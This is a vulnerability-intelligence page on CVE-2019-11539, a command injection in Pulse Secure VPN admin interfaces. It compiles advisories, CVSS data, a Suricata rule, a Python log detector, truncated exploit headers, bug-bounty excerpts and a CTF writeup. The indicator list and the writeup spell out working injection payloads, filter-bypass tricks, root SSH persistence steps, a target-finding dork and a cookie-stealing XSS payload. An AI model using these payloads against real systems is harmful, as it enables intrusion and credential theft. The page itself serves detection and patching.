CVE-2019-11539
Published 2019-04-26
Priority P1 · 87 · high · 7.2 (CVSS 3.1)
Vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Ransomware
CISA Known Exploited Vulnerability, due 2022-05-03
Exploited in the wild
EPSS: 98.62% (99.9th percentile)
In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.
Affected
72 ranges (distinct vendor/product pairs shown; version ranges were not captured)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | connect_secure | — | — |
| ivanti | policy_secure | — | — |
| ivanti | pulse_connect_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
Detection & IOCs (extracted from sources)
- Exploit sends a GET request to /dana-admin/diag/diag.cgi with parameter 'a=td' (tcpdump action) and an 'options' parameter containing the Perl injection payload '-r$x="<cmd>",system$x#' to overwrite /data/runtime/tmp/tt/setcookie.thtml.ttc, then triggers execution via a second GET to /dana-na/auth/setcookie.cgi.
- The injection payload uses Perl syntax: -r$x="<command>",system$x# to inject arbitrary OS commands via the tcpdump 'options' parameter. Detect GET requests to /dana-admin/diag/diag.cgi containing 'system' and '$x' in the 'options' query parameter.
- The exploit uses 'env' to bypass application whitelisting before the injected command. Look for 'env ' prepended to commands in the options parameter.
- The exploit requires a valid admin DSID session cookie. Monitor for DSID cookie usage against /dana-admin/ paths from unexpected source IPs, especially combined with requests to diag.cgi.
- Post-exploitation: attacker downloads files using /home/bin/curl (not in $PATH by default) and modifies /etc/cloud_sshd_config and /.ssh/authorized_keys to establish persistent SSH root access on port 6667.
- The CSRF token 'xsauth' is extracted from the diag.cgi page body via regex scan for /xsauth=([[:xdigit:]]+)/. Monitor for rapid sequential GET then GET patterns to diag.cgi followed by setcookie.cgi.
- Google dork for exposed vulnerable endpoints: inurl:/dana-na/ filetype:cgi
- CVE-2019-11539 is known to be used in ransomware campaigns and is listed in the CISA Known Exploited Vulnerabilities catalog. Prioritize detection and patching accordingly.
- The exploit payload has bad characters that must be avoided: &*(){}[]`;|?\n~<>"'. The Metasploit module forces manual bad-character analysis with 'generic/none' encoder for the Unix In-Memory target.
- The CTF writeup demonstrates that \x2a (ASCII '*') can be used as a wildcard substitute for '$' in the payload to bypass certain character filters, and Unicode line terminators (U+2028 LINE SEPARATOR) can replace filtered \n/\r.
- Affected versions: Pulse Connect Secure 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, 8.1RX before 8.1R15.1; Pulse Policy Secure 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, 5.1RX before 5.1R15.1.
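As an added example (not code from any of the sources above), the indicators in this list turned into detection logic over constructed web-server access-log lines: it flags GET requests to /dana-admin/diag/diag.cgi whose options parameter carries the -r / system / $x payload shape, separates those from a plain -r value that the ET rule alone would also match, and correlates a follow-up GET to /dana-na/auth/setcookie.cgi from the same source. The Apache combined log layout, the sample IPs and the CMD placeholder are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Assumed layout: Apache "combined"-style access-log lines (constructed sample
# data below). 'CMD' stands in for the command placeholder in the payload shape
# quoted on this page, -r$x="<cmd>",system$x#, here URL-encoded.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

DIAG_PATH = "/dana-admin/diag/diag.cgi"
SETCOOKIE_PATH = "/dana-na/auth/setcookie.cgi"
# Strings the injection must carry: tcpdump's -r flag, then the Perl that
# assigns $x and hands it to system.
INJECTION_MARKERS = ("-r", "system", "$x")
CORRELATION_WINDOW = timedelta(seconds=60)

SAMPLE_LOG = """\
203.0.113.7 - - [12/Oct/2019:10:15:01 +0000] "GET /dana-admin/diag/diag.cgi?a=td&options=-r%24x%3D%22CMD%22%2Csystem%24x%23 HTTP/1.1" 200 512
203.0.113.7 - - [12/Oct/2019:10:15:03 +0000] "GET /dana-na/auth/setcookie.cgi HTTP/1.1" 200 128
198.51.100.4 - - [12/Oct/2019:10:20:00 +0000] "GET /dana-admin/diag/diag.cgi?a=td&options=-r+old.pcap HTTP/1.1" 200 2048
198.51.100.9 - - [12/Oct/2019:10:21:00 +0000] "GET /dana-admin/diag/diag.cgi?a=td&options=-n+-s+0 HTTP/1.1" 200 2048
198.51.100.9 - - [12/Oct/2019:10:21:05 +0000] "GET /dana-na/auth/setcookie.cgi HTTP/1.1" 200 128
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "url": m.group("url"),
    }


def classify_diag_request(url):
    """Return 'injection', 'suspicious' or None for a request URL.

    'injection'  - diag.cgi whose options value carries every payload marker
    'suspicious' - diag.cgi whose options value starts with -r (the shape the
                   ET rule on this page matches) but lacks the Perl markers
    """
    parts = urlsplit(url)
    if parts.path != DIAG_PATH:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    options = query.get("options", [""])[0]  # parse_qs already percent-decodes
    if all(marker in options for marker in INJECTION_MARKERS):
        return "injection"
    if options.startswith("-r"):
        return "suspicious"
    return None


def detect(lines):
    """Return findings as (ip, verdict, url) tuples, in log order.

    A GET to setcookie.cgi from the same source within CORRELATION_WINDOW of a
    flagged diag.cgi request is reported as the execution trigger of the chain.
    """
    findings = []
    last_flagged = {}  # source ip -> timestamp of its last flagged diag.cgi hit
    for line in lines:
        event = parse_line(line)
        if event is None or event["method"] != "GET":
            continue
        verdict = classify_diag_request(event["url"])
        if verdict is not None:
            findings.append((event["ip"], verdict, event["url"]))
            last_flagged[event["ip"]] = event["ts"]
            continue
        seen = last_flagged.get(event["ip"])
        if (urlsplit(event["url"]).path == SETCOOKIE_PATH and seen is not None
                and event["ts"] - seen <= CORRELATION_WINDOW):
            findings.append((event["ip"], "trigger-after-injection", event["url"]))
    return findings
```

Running `detect(SAMPLE_LOG.splitlines())` yields one injection, its setcookie.cgi trigger from the same source, and one suspicious plain -r request; the benign tcpdump options and the unrelated setcookie.cgi hit produce nothing.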
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.2 | HIGH | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| nvd | v3.0 | 8.0 | HIGH | CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| vulncheck | — | 7.2 | HIGH | — |
| cisa | — | 7.2 | HIGH | — |
Ivanti · vendor_ivanti · 2021-11-03 · CVSS 7.2
CVE-2019-11539 [HIGH] Pulse Connect Secure Command Injection (admin)
Ivanti Pulse Connect Secure and Policy Secure allows an authenticated attacker from the admin web interface to inject and execute commands.
CVE IDs: CVE-2019-11539
Affected products: Pulse Connect Secure
This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Required Action: Apply updates per vendor instructions.
Remediation Due Date: 2022-05-03
Known to be used in ransomware campaigns.
CISA · cisa · 2021-11-03 · CVSS 7.2
CVE-2019-11539 [HIGH] CWE-78 Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
Vulnerability: Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
Affected: Ivanti Pulse Connect Secure and Pulse Policy Secure
Ivanti Pulse Connect Secure and Policy Secure allows an authenticated attacker from the admin web interface to inject and execute commands.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-11539
Remediation Due Date: 2022-05-03
GHSA · ghsa_unreviewed · 2022-05-24
CVE-2019-11539 [HIGH] CWE-78 GHSA-mchx-p635-vpq8: In Pulse Secure Pulse Connect Secure version 9
In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.
VulnCheck · vulncheck · 2019 · CVSS 7.2
CVE-2019-11539 [HIGH] CWE-78 Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
Ivanti Pulse Connect Secure and Policy Secure allows an authenticated attacker from the admin web interface to inject and execute commands.
Affected: Ivanti Connect Secure and Policy Secure
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities; https://cisa.gov/news-events/cybersecurity-advisories/aa20-259a; https://www.esentire.com/security-advisories/ransomware-groups-exploit-remote-access-services; https://cdn.pathfactory.com/assets/10753/contents/298161/03f15d14-01bb-462b-a8d4-d8c6149f5604.pdf; https://cybersecurityworks.com/patchwatch/patch-watch-csw-analysis-of-pulse-secure-vulnerabili
Suricata · suricata · 2021-09-23 · CVSS 7.2
CVE-2019-11539 [HIGH] ET EXPLOIT Pulse Secure Post-Auth OS Command Injection (CVE-2019-11539)
Rule (truncated at the end of its metadata in the source):
```
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Pulse Secure Post-Auth OS Command Injection (CVE-2019-11539)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/dana-admin/diag/diag.cgi"; fast_pattern; content:"&options="; distance:0; content:"-r"; distance:0; reference:url,packetstormsecurity.com/files/154376/Pulse-Secure-8.1R15.1-8.2-8.3-9.0-SSL-VPN-Remote-Code-Execution.html; reference:url,packetstormsecurity.com/files/155277/Pulse-Secure-VPN-Arbitrary-Command-Execution.html; reference:cve,2019-11539; classtype:attempted-admin; sid:2034014; rev:1; metadata:affected_product Pulse_Secure, attack_target Server, created_at 2021_09_23, cve CVE_2019_11539, deployment P
```
Exploit-DB · exploitdb · 2019-11-20
CVE-2019-11539 Pulse Secure VPN - Arbitrary Command Execution (Metasploit)
```
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  # ...
  'Name' => 'Pulse Secure VPN Arbitrary Command Execution',
  'Description' => %q{
    This module exploits a post-auth command injection in the Pulse Secure
    VPN server to execute commands as root. The env(1) command is used to
    bypass application whitelisting and run arbitrary commands.

    Please see related module auxiliary/gather/pulse_secure_file_disclosure
    for a pre-auth file read that is able to obtain plaintext and hashed
    credentials, plus session IDs that may be used with this exploit.

    A valid administrator session ID is required in lieu of untested SSRF.
  },
  'Author' => [
    'Oran
```
Exploit-DB · exploitdb · 2019-09-06 · CVSS 7.2
CVE-2019-11539 [HIGH] Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution
```
#!/usr/bin/python
#
# Exploit Title: Pulse Secure Post-Auth Remote Code Execution
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 09/05/2019
# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_)
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: linux
# CVE : CVE-2019-11539
#
# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
#
# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN
# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
# You will need your own configuration and authorized_keys files.
#
# Reference: https://nvd.nist.gov/v
```
Metasploit · metasploit
Pulse Secure VPN Arbitrary Command Execution
This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The env(1) command is used to bypass application whitelisting and run arbitrary commands. Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. A valid administrator session ID is required in lieu of untested SSRF.
HackerOne · hackerone · 2024-06-18 · CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
## Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that `https://██████████` instance is vulnerable to described vulnerabilities.
## POC
Reading `/etc/p
HackerOne · hackerone · 2021-07-29 · CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
## Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that `https://██████████` instance is vulnerable to described vulnerabilities.
## POC
Reading `/etc/passwd` v
HackerOne · hackerone · 2020-05-07 · CVSS 10.0
CVE-2019-11510 [CRITICAL] Command Injection (via CVE-2019-11510 and CVE-2019-11539)
**Summary:**
The Navy has a Pulse Secure SSL VPN (https://████████/dana-na/auth/url_default/welcome.cgi) that is vulnerable to:
CVE-2019-11510 - Pre-auth Arbitrary File Reading
CVE-2019-11539 - Post-auth Command Injection
vulnerable hostname from ssl certificate: ██████████.navy.mil
The pre-auth arbitrary file reading vulnerability (CVE-2019-11510) enables an unauthenticated user to read the file /data/runtime/mtmp/lmdb/dataa/data.mdb from the Pulse VPN device. This file contains admin and other users' credentials in plain-text format. This information can be used to log into the Pulse device as an administrator.
Once logged in as an administrator, the post-auth command injection vulnerability (CVE-2019-11539) allows an attacker
HackerOne · hackerone · 2019-12-02 · CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
## Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that https://████ instance is vulnerable to described vulnerabilities.
## POC
Extracting `/etc/passwd` as examp
HackerOne · hackerone · 2019-08-10 · CVSS 7.2
[HIGH] Potential pre-auth RCE on Twitter VPN
Hi, we (Orange Tsai and Meh Chang) are the security research team from DEVCORE. Recently, we have been doing research on SSL VPN security and found several critical vulnerabilities in Pulse Secure SSL VPN! We have reported them to the vendor and [patches](https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101) were released on `2019/4/25`. Since then, we have kept monitoring numerous large corporations using Pulse Secure, and we noticed that Twitter hasn't patched the SSL VPN server for over one month!
These vulnerabilities include a pre-auth file reading (CVSS 10) and a post-auth (admin) command injection (CVSS 8.0) which can be chained into a pre-auth RCE! Here are all the vulnerabilities we found:
* CVE-2019-11510 - Pre-auth Arbitrary File Reading
* CV
Tenable · blogs_tenable · 2025-01-08 · CVSS 9.0
[CRITICAL] CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
Tenable · blogs_tenable · 2024-01-10 · CVSS 8.2
[HIGH] CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
Sentinelone · blogs_sentinelone · 2022-11-30
REvil
Qualys · blogs_qualys · 2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Tenable · blogs_tenable · 2021-08-25
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
Checkpoint · blogs_checkpoint · 2021-04-05
CVE-2021-21975 5th April – Threat Intelligence Report
## 5th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 5th April, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Personal information of some 553 million Facebook users from 100 countries has been stolen and published online for free in a hacking forum. The records include full name, Facebook ID, phone number, email, location, bio and more.
Iranian APT group Charming Kitten, linked to the government, has launched a new phishing campaign
Tenable · blogs_tenable · 2020-09-17
US Cybersecurity Agency CISA Alert: Foreign Threat Actors Continue to Target Unpatched Vulnerabilities
Tenable · blogs_tenable · 2019-08-27 · CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
Tenable · blogs_tenable · 2019-08-21 · CVSS 10.0
[CRITICAL] CVE-2019-11510: Proof of Concept Available for Arbitrary File Disclosure in Pulse Connect Secure
Sentinelone · blogs_sentinelone
REvil
# REvil Ransomware: In-Depth Analysis, Detection, and Mitigation
As if ransomware itself weren't dangerous enough, a new type of attack involving ransomware is making waves in the cybersecurity community. Ransomware-as-a-Service (RaaS) operations are becoming more common and more profitable for threat actors looking to launch a variety of attacks. One such operation is known as REvil, which involved a core team of threat actors offering the malware to other attackers for a price.
Although the Russian Federal Security Service claims to have dismantled REvil and charged several of the ransomware group’s members, a deeper look at this type of ransomware and RaaS can help organizations protect themselves against these types of attacks in the future.
## What Is REvil Ransomware?
REvil ransomwa
CTF · ctf_writeups · 2019 · CVSS 7.2
CVE-2019-11539 [HIGH] 20191018-hitcon-quals / README
# HITCON CTF 2019 Writeup
## web
### Virtual Public Network [183pts]
> http://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
CVE-2019-11539
Use `\x2a` instead of `$`
```
GET /cgi-bin/diag.cgi?options=-r$x%3d"bash+-c+\"/\x2aREAD_FLAG\x2a\"",system$x%23+2>./tmp/cmn.thtml+
```

` can be used as a `SingleLineComment`:
> https://stackoverflow.com/a/18638833
But `\n` and `\r` are filtered.
After reading ECMA-262, we found other line terminators:
> http://www.ecma-international.org/ecma-262/6.0/#sec-line-terminators
So the final payload:
```
http://3.114.5.202/fd.php?q=pupiles。qwer。design/?"%2beval(atob(`ZG9jdW1lbnQuY29va2ll`))%E2%80%A8-->
```
## reverse
### EmojiVM [187pts]
A challenge of vm_re. The data struct is a tree like this:
```
struct node{
qwor
```
References
- http://packetstormsecurity.com/files/154376/Pulse-Secure-8.1R15.1-8.2-8.3-9.0-SSL-VPN-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/155277/Pulse-Secure-VPN-Arbitrary-Command-Execution.html
- http://packetstormsecurity.com/files/162092/Pulse-Secure-VPN-Arbitrary-Command-Execution.html
- http://www.securityfocus.com/bid/108073
- https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/
- https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
- https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0010
- https://www.kb.cert.org/vuls/id/927237
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-11539
Timeline
- 2019-04-26: Published
- 2021-11-03: Added to CISA KEV
- Exploited in the wild